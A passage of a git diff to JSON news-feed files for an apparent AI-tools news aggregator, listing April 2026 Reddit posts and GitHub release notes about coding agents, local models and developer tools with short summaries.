"tool_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-13T15:56:23.000Z", - "summary": "hey everyone, sharing this because it's directly relevant to what a lot of people here are building.\n\npackt publishing is running a hands on workshop on april 25 on context engineering for multi agent systems with denis rothman.\n\nwhat gets covered:\n\n\\- semantic blueprints for multi agent orchestration\n\n\\- MCP integration for standardized agent tool use\n\n\\- context window management across agents\n\n\\- high fidelity RAG pipelines with verifiable citations\n\n\\- safeguards against prompt injection and", - "category": "ai_research" - }, - { - "title": "Docker sandbox templates for running Claude Code with a web/mobile UI (CloudCLI)", - "url": "https://reddit.com/r/ClaudeAI/comments/1slld23/docker_sandbox_templates_for_running_claude_code/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-14T20:58:35.000Z", - "summary": "I maintain CloudCLI, an open source web/mobile UI for AI Coding agents like Claude Code, Gemini and Codex (https://github.com/siteboon/claudecodeui if you are not aware)\n\nWe recently added Docker Sandbox support and I wanted to share it here.\n\nThe idea is simple, Docker sandbox allows you to run agents in an isolated environment and we've created a template to also add a webui on top of it and interact with your sandbox instead of a terminal.\n\n`npx @cloudcli-ai/cloudcli@latest sandbox ~/my-proje", - "category": "ai_tools" - }, - { - "title": "How to make Codex (or any agent) do your work without any instructions (it learns by watching you!). 
Open-source", - "url": "https://reddit.com/r/ChatGPT/comments/1sljafu/how_to_make_codex_or_any_agent_do_your_work/", - "source": "Reddit r/ChatGPT", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-14T19:43:41.000Z", - "summary": "Hiii - here is a simple demo of how AgentHandover watches my screen and then instructs AI agent to do it like me without me explaining. \n\nAgentHandover watches how you work on your Mac, turns your workflows into reusable Skills, and lets agents like Codex, OpenClaw, etc. can execute them the way you do it by just typing /ah-skill-name and watch it do the magic.\n\nEach Skill captures the what, the why, and the how - steps, strategy, decision logic, guardrails, and your writing voice. And they're s", - "category": "ai_tools" - }, - { - "title": "pnpm v10.33.0 released", - "url": "https://github.com/pnpm/pnpm/releases/tag/v10.33.0", - "source": "GitHub Releases · pnpm", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.99, - "date": "2026-03-24T16:47:01.000Z", - "summary": "## Minor Changes\r\n\r\n* Added a new `dedupePeers` setting that reduces peer dependency duplication. When enabled, peer dependency suffixes use version-only identifiers (`name@version`) instead of full dep paths, eliminating nested suffixes like `(foo@1.0.0(bar@2.0.0))`. 
This dramatically reduces the number of package instances in projects with many recursive peer dependencies [#11070](https://github.com/pnpm/pnpm/issues/11070).\r\n\r\n## Patch Changes\r\n\r\n* Fail on incompatible lockfiles in CI when", - "category": "ai_tools" - }, - { - "title": "Gemini CLI v0.37.2 released", - "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.37.2", - "source": "GitHub Releases · Gemini CLI", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.9199999999999999, - "date": "2026-04-13T20:19:57.000Z", - "summary": "## What's Changed\n* fix(patch): cherry-pick 9d741ab to release/v0.37.1-pr-24565 to patch version v0.37.1 and create version 0.37.2 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25322\n\n\n**Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.37.1...v0.37.2", - "category": "ai_tools" - }, - { - "title": "Turbo v2.9.6 released", - "url": "https://github.com/vercel/turborepo/releases/tag/v2.9.6", - "source": "GitHub Releases · Turbo", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 0.9199999999999999, - "date": "2026-04-10T13:23:09.000Z", - "summary": "\n\n## What's Changed\n### create-turbo\n* chore: Update dependencies found in audits by @anthonyshew in https://github.com/vercel/turborepo/pull/12586\n### Examples\n* fix: Add missing `@types/node` to `with-svelte` example apps by @anthonyshew in https://github.com/vercel/turborepo/pull/12585\n### Changelog\n* docs: Add Bun equivalent for updating dependencies by @anthonyshew in https://github.com/vercel/turborepo/pul", - "category": "ai_tools" - }, - { - "title": "We're all building on top of something that changes under us every week, and nobody has a plan for that", - "url": "https://reddit.com/r/ClaudeAI/comments/1sl3yzt/were_all_building_on_top_of_something_that/", - 
"source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 0.9, - "date": "2026-04-14T09:46:57.000Z", - "summary": "I've been using Claude (Pro, now Max) for about 7 months, primarily for building and shipping small tools and automations for clients. I'm not complaining about Claude itself here , this is about a pattern I'm noticing across the entire AI tooling ecosystem that I think deserves a real conversation.\n\nEvery week, something changes. A model gets updated and suddenly the same prompt that worked reliably for two months produces different output. An API response structure shifts slightly. A feature g", - "category": "ai_tools" - }, - { - "title": "Vercel CLI vercel@51.2.1 released", - "url": "https://github.com/vercel/vercel/releases/tag/vercel%4051.2.1", - "source": "GitHub Releases · Vercel CLI", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.84, - "date": "2026-04-14T07:15:49.000Z", - "summary": "### Patch Changes\n\n- Add `ai-gateway api-keys create` command for creating AI Gateway API keys with optional quota limits ([#15744](https://github.com/vercel/vercel/pull/15744))\n\n- Improve `vercel blob list-stores` with `--json` and `--no-projects`, exclude non-blob stores when the API returns a `type` field, and show a richer table for non-TTY output while keeping linked-project filtering, `--all`, and interactive store selection on TTY. 
([#14653](https://github.com/vercel/vercel/pull/14653", - "category": "ai_tools" - }, - { - "title": "Gemini CLI v0.38.0 released", - "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.0", - "source": "GitHub Releases · Gemini CLI", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-04-14T23:21:55.000Z", - "summary": "## What's Changed\n* fix(cli): refresh slash command list after /skills reload by @NTaylorMullen in https://github.com/google-gemini/gemini-cli/pull/24454\n* Update README.md for links. by @g-samroberts in https://github.com/google-gemini/gemini-cli/pull/22759\n* fix(core): ensure complete_task tool calls are recorded in chat history by @abhipatel12 in https://github.com/google-gemini/gemini-cli/pull/24437\n* feat(policy): explicitly allow web_fetch in plan mode with ask_user by @Adib234 in https://", - "category": "ai_tools" - }, - { - "title": "My first impressions of Minimax M2.7 (Q5_K_M) vs Qwen 3.5 27b (Q8_0)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1slm3si/my_first_impressions_of_minimax_m27_q5_k_m_vs/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-04-14T21:25:57.000Z", - "summary": "I'm not sure if the AesSedai's Q5\\_K\\_M version of Minimax M2.7 is too much lobotomized or if the model itself is kind of weak. \n \nI did a simple experiment with both models running with the recommended parameters. The task was simply to generate some [AGENTS.md](http://AGENTS.md) files for a Python/Fast API/LangGraph project of mine (Roo Code /init command), which has some degree of complexity. \n \nMinimax runs painfully slowly on my setup, so I was expecting it to demolish Qwen 3.5... 
but", - "category": "ai_models" - }, - { - "title": "Refusal in open-weights models looks like a sparse gate -> amplifier circuit, and generalizes across 12 models from 6 labs (2B-72B)", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sllajh/refusal_in_openweights_models_looks_like_a_sparse/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-14T20:55:57.000Z", - "summary": "Paper: [https://arxiv.org/abs/2604.04385](https://arxiv.org/abs/2604.04385)\n\nI've been trying to understand where refusal actually lives. How it works mechanistically. Arditi et al showed refusal can be steered with a single direction. What I looked at here is the mechanistic question: what circuit creates and amplifies that direction?\n\nMain result: Across 12 models from 6 labs, I keep finding a sparse **gate-amplifier** pattern.\n\nA mid-layer 'gate' attention head reads a detection-layer represe", - "category": "ai_models" - }, - { - "title": "Tencent HY-World 2.0 appears to be dropping on April 15 — open-source multimodal 3D world generation from Tencent Hunyuan", - "url": "https://reddit.com/r/StableDiffusion/comments/1sll638/tencent_hyworld_20_appears_to_be_dropping_on/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-14T20:51:17.000Z", - "summary": "Tencent’s Hunyuan team is apparently releasing **HY-World 2.0 tomorrow**, according to a teaser post from Tengfei Wang (Tencent Hunyuan): “Launching tomorrow — Tencent #HYWorld 2.0, an engine-ready World Model\" [Source](https://x.com/DylanTFWang/status/2043952886166761519)\n\nThe launch page is already live, and this looks like a major upgrade over HY-World 1.5 / WorldPlay.\n\n## What HY-World 2.0 does\n\nHY-World 2.0 is a multimodal world model that can generate persistent, explorable 3D environments", - "category": "creative_tools" 
- }, - { - "title": "Updated Minimax m2.7 still doesn't allow coding a product. But before the next riot starts, Ryan Lee has already confirmed that they are still working on the license, and sale of products built by m2.7 is permitted.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1slkjqp/updated_minimax_m27_still_doesnt_allow_coding_a/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-14T20:28:09.000Z", - "summary": "Reddit r/LocalLLaMA — 9 upvotes, 14 comments", - "category": "ai_models" - }, - { - "title": "2x Asus Ascent GX10 - MiniMax M2.7 AWQ - cloud providers are dead to me", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sli7xr/2x_asus_ascent_gx10_minimax_m27_awq_cloud/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-14T19:05:55.000Z", - "summary": "Hello,\n\nI've been on a quest to get something \"close enough\" of Opus 4.5 running locally, for agentic coding, as SWE with 15 years of experience.\n\nI tried with one spark (yeah I'm calling my Asus Ascent GX10 sparks - they're the same), with models like Qwen 3.5 122B-A10B, Qwen3-Coder-Next, M2.5-REAP, ... Nothing was scratching the itch, too much frustration. 
128GB is simply not enough (for me) right now.\n\nSo I bought a second one (first one I paid 2800€, second one 2500€, plus 60€ cable - total ", - "category": "ai_models" - }, - { - "title": "Parisians: we're running an open source AI art hackathon with LTX + NVIDIA this Saturday", - "url": "https://reddit.com/r/StableDiffusion/comments/1slgzja/parisians_were_running_an_open_source_ai_art/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-14T18:22:37.000Z", - "summary": "Hack and train on H100s for a day w/ people from the open source community + reserachers. Full details [here](https://ados.events/hackathon)", - "category": "creative_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-15.json b/data/news-feed-2026-04-15.json deleted file mode 100644 index bcef349..0000000 --- a/data/news-feed-2026-04-15.json +++ /dev/null @@ -1,255 +0,0 @@ -{ - "generated": "2026-06-05T00:44:34.272Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-15", - "article_count": 15, - "archived_story_count": 418, - "articles": [ - { - "title": "Qwen Code v0.14.5 released", - "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.14.5", - "source": "GitHub Releases · Qwen Code", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-15T15:33:06.000Z", - "summary": "## What's Changed\n* feat(cli/sdk): expose /context usage data in non-interactive mode and SDK API by @wenshao in https://github.com/QwenLM/qwen-code/pull/2916\n* feat(cli): add startup performance profiler by @doudouOUC in https://github.com/QwenLM/qwen-code/pull/3232\n* feat(core): implement fork subagent for context sharing by @wenshao in https://github.com/QwenLM/qwen-code/pull/2936\n* feat(vscode-ide-companion): add /account for 
account display by @qqqys in https://github.com/QwenLM/qwen-code/p", - "category": "ai_tools" - }, - { - "title": "MCP vs API?", - "url": "https://reddit.com/r/ClaudeAI/comments/1slr3qj/mcp_vs_api/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-15T00:52:13.000Z", - "summary": "I am trying to get deeper into utilizing Claude Code (trying to become more technical) as I have recently switched to the terminal and wanted some feedback on better understanding MCP vs APIs. \n \nTo me it seems like APIs are direct instructions on how to navigate and pull or push data between a product and another entity. MCP on the other hand seems like it is allowing the AI to dynamically use tools and definitions based on your current context.\n\nI have heard a lot of people say that API is ", - "category": "ai_tools" - }, - { - "title": "Built a Visual Studio Code extension to use OpenCode as a GUI sidebar instead of the terminal", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sml59n/built_a_visual_studio_code_extension_to_use/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-15T22:28:23.000Z", - "summary": "Hey everyone,\n\nI built a VS Code extension that brings OpenCode directly into your sidebar as a native panel, that uses the UI elements exactly as they are from the OpenCode Desktop app. No terminal needed, no browser tab. 
It just lives in your activity bar and works easily.\n\nWhat it does:\n\n* Runs OpenCode sessions inside a VS Code webview sidebar\n* Automatically uses whatever workspace folder you have open\n* Can auto-start a local OpenCode server when you open the sidebar\n* Keeps your session a", - "category": "ai_models" - }, - { - "title": "Open Ai Agent Dashboard for Monitoring, Memory, Performance and Audit Trail", - "url": "https://reddit.com/r/ChatGPT/comments/1sm2bkg/open_ai_agent_dashboard_for_monitoring_memory/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-15T10:39:22.000Z", - "summary": "Been building AI agents for about a year now and the thing that always drove me crazy is you deploy an agent, it runs for hours, and you have absolutely no idea what it did. The logs say \"task complete\" 47 times but did it actually do 47 different things or did it just loop the same task over and over?\n\nI had an agent burn through about $340 in API credits over a weekend because it got stuck retrying the same request. The logs showed 200 OK on every call. Everything looked fine. It just kept doi", - "category": "ai_tools" - }, - { - "title": "[P] Added 8 Indian languages to Chatterbox TTS via LoRA — 1.4% of parameters, no phoneme engineering [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1sltun8/p_added_8_indian_languages_to_chatterbox_tts_via/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-15T02:55:46.000Z", - "summary": "TL;DR: \nFine-tuned Chatterbox-Multilingual (Resemble AI's open-source TTS) to support Telugu, Kannada, Bengali, Tamil, Malayalam, Marathi, Gujarati, and Hindi using LoRA adapters + tokenizer extension. Only 7.8M / 544M parameters trained. 
Model + audio samples available.\n\n\\---\n\nThe Problem\n\nChatterbox-Multilingual supports 23 languages with zero-shot voice cloning, but no Dravidian languages (Telugu, Kannada, Tamil, Malayalam) and limited Indo-Aryan coverage beyond Hindi. That's 500M+ speakers ", - "category": "ai_research" - }, - { - "title": "Claude Code on desktop, redesigned for parallel agentic work.", - "url": "https://reddit.com/r/ClaudeAI/comments/1slictc/claude_code_on_desktop_redesigned_for_parallel/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.99, - "date": "2026-04-14T19:10:50.000Z", - "summary": "New sidebar for parallel sessions. Drag-and-drop layout. Integrated terminal. Run multiple agents from one window. \n\nNew tools make it easier to complete work without leaving the app.\n\nIntegrated terminal, in-app file editing, HTML + PDF preview, and a rebuilt diff viewer. Drag any panel into the layout that fits how you work. Three view modes when you want more (or less) signal.\n\nPlus more updates and customizations to fit how you work including SSH for Mac, keyboard shortcuts, and CLI plugin p", - "category": "ai_tools" - }, - { - "title": "I built a CLI that scans your project and auto-installs matching skills for Claude Code", - "url": "https://reddit.com/r/ClaudeAI/comments/1sm4at4/i_built_a_cli_that_scans_your_project_and/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.96, - "date": "2026-04-15T12:13:27.000Z", - "summary": "Hey r/ClaudeAI — I built a small tool to fix something that bugged me: every time I start a new project, picking the right skills from [skills.sh](http://skills.sh) is manual and slow.\n\n\n\nskillgrab does this:\n\n\n\n1. 
Scans \\`package.json\\`, \\`requirements.txt\\`, \\`pubspec.yaml\\`, \\`go.mod\\`, \\`Dockerfile\\`, \\`vercel.json\\`, etc. to detect your stack\n\n2. Reads your README for non-code hints (\"landing page\", \"pricing\", \"SEO\") and asks if you want marketing/design/sales skills\n\n3. Queries [skills.sh]", - "category": "ai_tools" - }, - { - "title": "Gemini CLI v0.38.1 released", - "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.1", - "source": "GitHub Releases · Gemini CLI", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.9199999999999999, - "date": "2026-04-15T17:56:33.000Z", - "summary": "## What's Changed\n* fix(patch): cherry-pick 050c303 to release/v0.38.0-pr-25317 to patch version v0.38.0 and create version 0.38.1 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25466\n\n\n**Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.38.0...v0.38.1", - "category": "ai_tools" - }, - { - "title": "MidJourney V8.1 Alpha Has Just Been Released. How Much Improvement Does It Have?", - "url": "https://reddit.com/r/midjourney/comments/1smlk07/midjourney_v81_alpha_has_just_been_released_how/", - "source": "Reddit r/midjourney", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-15T22:45:01.000Z", - "summary": "A new r/midjourney version always creates excitement. 
Beautiful sample images start appearing everywhere, people begin testing it immediately, and the usual question follows:\n\n**Is it really better, or is it just new?**\n\nWith MidJourney V8.1 Alpha now available, I wanted to look beyond the hype and test it in a more practical way.\n\nInstead of judging it in isolation, I compared it against two other strong image models available today: **Nano Banana 2** and **Grok Imagine 1.0.**\n\nThe goal was sim", - "category": "creative_tools" - }, - { - "title": "Great news, everyone. If you were sick of the condescending 5.2 model, creators have announced 5.3, with a less preachy tone. I have tested it over the last few days and it has become more balanced.", - "url": "https://reddit.com/r/ChatGPT/comments/1smkzda/great_news_everyone_if_you_were_sick_of_the/", - "source": "Reddit r/ChatGPT", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-15T22:21:37.000Z", - "summary": "I noticed a change from the condescending, sometimes rude and persistent looping behaviour of ChatGPT 5.2, so I asked Google about it and got this confirmation back that in March they updated to 5.3. 
I think I'm starting to receive that model now because it's become less preachy and isn't looping into psychoanalysis of me every time I talk to it.\n\n\n\nChatGPT has likely felt \"nicer\" recently due to several updates in early 2026 designed to improve its conversational tone and reduce the rigid, robo", - "category": "ai_tools" - }, - { - "title": "Qwen3.5 35b is sure still one the best local model (pulling above its weight) - More Details", - "url": "https://reddit.com/r/LocalLLaMA/comments/1smgqgy/qwen35_35b_is_sure_still_one_the_best_local_model/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-04-15T19:46:08.000Z", - "summary": "Last time I posted on how this model has performed in creating the webapp based on provided research paper. I got so much love to see people has appreciated the post and of-course the potential of this MOE model.\n\nI am sharing details on how I used this model to create webapp just using prompt and step by step guiding it. Later I converted my guidance steps into skills using same qwen-code cli with this model, that helped to add more examples.\n\nHere is github repo where I have added the [researc", - "category": "ai_models" - }, - { - "title": "Is it possible for an open-source AI that you run at home to become as powerful as that of chatgpt and others at that level?", - "url": "https://reddit.com/r/ChatGPT/comments/1smepps/is_it_possible_for_an_opensource_ai_that_you_run/", - "source": "Reddit r/ChatGPT", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-15T18:34:26.000Z", - "summary": "What would need to be true for someone to be able to run something that powerful entirely from home? Do they just need the correct weights? Assume that they don't need to do training (maybe some tech enthusiast does the training and just hands off the built model to people). 
Would storage space be a constraint? How much storage would they need? And how much RAM would they need? This is all for 1 person using it, not like the person would be serving an AI service out of their garage or something", - "category": "ai_tools" - }, - { - "title": "Lyra 2.0 : Explorable Generative 3D Worlds", - "url": "https://reddit.com/r/StableDiffusion/comments/1smbyjf/lyra_20_explorable_generative_3d_worlds/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 1, - "date": "2026-04-15T16:59:26.000Z", - "summary": "Nvidia released **Lyra 2.0**, a framework for generating persistent, explorable 3D worlds at scale, from NVIDIA Research. \n \nGenerating large-scale, complex environments is difficult for AI models. Current models often “forget” what spaces look like and lose track of movement over time, causing objects to shift, blur, or appear inconsistent. This prevents them from creating the reliable 3D environments required for downstream simulations. Lyra 2.0 solves these issues by: \n \n Maintaining per-", - "category": "creative_tools" - }, - { - "title": "[P] Built GPT-2, Llama 3, and DeepSeek from scratch in PyTorch - open source code + book", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sm82ze/p_built_gpt2_llama_3_and_deepseek_from_scratch_in/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-15T14:42:55.000Z", - "summary": "I wrote a book that implements modern LLM architectures from scratch. The part most relevant to this sub:\n\nChapter 3 takes GPT-2 and swaps exactly 4 things to get Llama 3.2-3B:\n\n1. LayerNorm → RMSNorm\n2. Learned positional encodings → RoPE\n3. GELU → SwiGLU\n4. 
Multi-Head Attention → Grouped-Query Attention\n\nThen loads Meta's real pretrained weights.\n\nChapter 5 builds DeepSeek's full architecture: MLA with the absorption trick, decoupled RoPE, MoE with shared experts and fine-grained segmentation,", - "category": "ai_models" - }, - { - "title": "Built GPT-2, Llama 3, and DeepSeek from scratch in PyTorch - open source code + book [p]", - "url": "https://reddit.com/r/MachineLearning/comments/1sm75yf/built_gpt2_llama_3_and_deepseek_from_scratch_in/", - "source": "Reddit r/MachineLearning", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-15T14:08:23.000Z", - "summary": "I spent the past year implementing five LLM architectures from scratch in PyTorch and wrote a book documenting the process.\n\nWhat's covered:\n\n* Vanilla encoder-decoder transformer (English to Hindi translation)\n* GPT-2 (124M), loading real OpenAI pretrained weights\n* Llama 3.2-3B, showing the exact 4 component swaps from GPT-2 (RMSNorm, RoPE, SwiGLU, GQA), loading Meta's pretrained weights\n* KV cache mechanics, MQA, GQA\n* DeepSeek: Multi-Head Latent Attention with absorption trick and decoupled ", - "category": "ai_research" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-16.json b/data/news-feed-2026-04-16.json deleted file mode 100644 index 0a03285..0000000 --- a/data/news-feed-2026-04-16.json +++ /dev/null @@ -1,259 +0,0 @@ -{ - "generated": "2026-06-05T00:44:34.430Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-16", - "article_count": 15, - "archived_story_count": 396, - "articles": [ - { - "title": "Vercel CLI vercel@51.5.1 released", - "url": "https://github.com/vercel/vercel/releases/tag/vercel%4051.5.1", - "source": "GitHub Releases · Vercel CLI", - "tags": [ - "developer_tool", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "developer_tool", - "cli_tool", - "tool_update" - ], - "importance": 
0.9199999999999999, - "date": "2026-04-16T20:37:28.000Z", - "summary": "### Patch Changes\n\n- Improve Claude Code Vercel plugin install and update prompts across CLI commands. ([#15921](https://github.com/vercel/vercel/pull/15921))\n\n- Updated dependencies \\[[`5219572d21a2ba4b49cc1c27d244c1ff5d76c591`](https://github.com/vercel/vercel/commit/5219572d21a2ba4b49cc1c27d244c1ff5d76c591), [`2babfa22946d80a92f1307a8d860a9039d695b09`](https://github.com/vercel/vercel/commit/2babfa22946d80a92f1307a8d860a9039d695b09), [`2babfa22946d80a92f1307a8d860a9039d695b09`](https://gi", - "category": "ai_tools" - }, - { - "title": "I got tired of copying/pasting between ChatGPT and X, so I built an extension that brings the AI directly into the timeline", - "url": "https://reddit.com/r/ChatGPT/comments/1snf7bl/i_got_tired_of_copyingpasting_between_chatgpt_and/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-16T20:20:53.000Z", - "summary": "I use ChatGPT to help draft posts or brainstorm replies, but the workflow of copying tweets, pasting them into ChatGPT, asking it to reply, and then pasting it back into Twitter was driving me crazy. Also, it almost always sounds like a generic robot\n\nSo, I built **Tweetback**, a Chrome/Edge/Firefox extension that brings your API key directly into the X/Twitter interface.\n\nI wanted to see how far I could push the AI to actually understand context and sound human. 
Here is what it can do:\n\n**\"Clon", - "category": "ai_tools" - }, - { - "title": "anyone else notice labs are getting more secretive about their best models?", - "url": "https://reddit.com/r/ChatGPT/comments/1sn599k/anyone_else_notice_labs_are_getting_more/", - "source": "Reddit r/ChatGPT", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-04-16T14:31:54.000Z", - "summary": "something shifted recently and i can't stop thinking about it. the trend used to be: new model drops, blog post goes up, everyone gets access on day one. now it feels like the most capable stuff is quietly going behind walls with \"restricted access\" or gated research programs, while the public-facing releases are... fine, but clearly not the frontier.\n\ngoogle dropped gemma 4 open-weight and it's genuinely good — MoE architecture, strong reasoning, apache license. meta's doing multimodal reasonin", - "category": "ai_tools" - }, - { - "title": "Mozilla Announces \"Thunderbolt\" As An Open-Source, Enterprise AI Client", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sn4ibj/mozilla_announces_thunderbolt_as_an_opensource/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch", - "open_source" - ], - "matching_tags": [ - "product_launch", - "open_source" - ], - "importance": 1, - "date": "2026-04-16T14:04:23.000Z", - "summary": "Reddit r/LocalLLaMA — 4 upvotes, 3 comments", - "category": "ai_models" - }, - { - "title": "Qwen3.6-35B-A3B released!", - "url": "https://reddit.com/r/LocalLLaMA/comments/1sn3izh/qwen3635ba3b_released/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-16T13:27:39.000Z", - "summary": "Meet Qwen3.6-35B-A3B:Now Open-Source!🚀🚀\n\nA sparse MoE model, 35B total params, 3B active. 
Apache 2.0 license.\n\n\\- Agentic coding on par with models 10x its active size\n\n\\- Strong multimodal perception and reasoning ability\n\n\\- Multimodal thinking + non-thinking modes\n\nEfficient. Powerful. Versatile. \n\nBlog:https://qwen.ai/blog?id=qwen3.6-35b-a3b\n\nQwen Studio:chat.qwen.ai\n\nHuggingFace:https://huggingface.co/Qwen/Qwen3.6-35B-A3B\n\nModelScope:https://modelscope.cn/models/Qwen/Qwen3.6-35B-A3B", - "category": "ai_models" - }, - { - "title": "Built a visual memory layer for Claude — see what Claude remembers about your projects (open source, free, WIP)", - "url": "https://reddit.com/r/ClaudeAI/comments/1smzaxb/built_a_visual_memory_layer_for_claude_see_what/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-04-16T10:13:13.000Z", - "summary": " Claude already has memory — but it's a black box. \n You can't see what it knows, what decisions were made, \n or how your project is progressing.\n \n Dendrite makes Claude's memory visible.\n \n How it works:\n - Claude writes structured memory slices via MCP \n (decisions, observations, tasks, open questions)\n - You see everything in a searchable 3-pane reader\n - Set your own preferences that Claude pulls from \n on every session\n - Track project progress, o", - "category": "ai_tools" - }, - { - "title": "Built an political benchmark for LLMs. KIMI K2 can't answer about Taiwan (Obviously). GPT-5.3 refuses 100% of questions when given an opt-out. 
[P]", - "url": "https://reddit.com/r/MachineLearning/comments/1smqsbu/built_an_political_benchmark_for_llms_kimi_k2/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-04-16T02:31:24.000Z", - "summary": "I spent the few days building a benchmark that maps where frontier LLMs fall on a 2D political compass (economic left/right + social progressive/conservative) using 98 structured questions across 14 policy areas. I tested GPT-5.3, Claude Opus 4.6, and KIMI K2. The results are interesting.\n\n\n\n**The repo is fully open-source -- run it yourself on any model with an API:** \n[https://github.com/dannyyaou/llm-political-eval](https://github.com/dannyyaou/llm-political-eval)\n\n\n\n\n\n**The headline finding", - "category": "ai_research" - }, - { - "title": "Keycard – inject API keys into subprocesses, never touch shell env", - "url": "https://www.keycard.studio/", - "source": "Hacker News", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.97, - "date": "2026-04-16T01:37:49.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "I turned my MacBook notch into a live Claude Code dashboard", - "url": 